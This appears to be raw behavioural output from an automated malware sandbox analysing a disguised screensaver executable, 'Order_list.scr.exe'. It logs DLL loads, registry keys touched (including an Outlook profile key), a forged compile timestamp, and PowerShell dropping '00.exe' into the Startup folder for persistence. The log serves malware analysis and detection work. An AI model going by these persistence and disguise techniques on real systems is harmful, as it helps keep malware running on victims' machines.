Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Order_list.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Order_list.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Order_list.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Order_list.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Order_list.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Source: Order_list.scr.exe

Static PE information: 0xF79C3086 [Tue Aug 23 02:46:30 2101 UTC]

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Code function: 8_2_06322E78 push esp; iretd

8_2_06322E79

Source: Order_list.scr.exe	Static PE information: section name: .text entropy: 7.01381456901877
Source: 00.exe.1.dr	Static PE information: section name: .text entropy: 7.01381456901877

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe\:Zone.Identifier:$DATA			Jump to behavior

Source: C:\Users\user\Desktop\Order_list.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
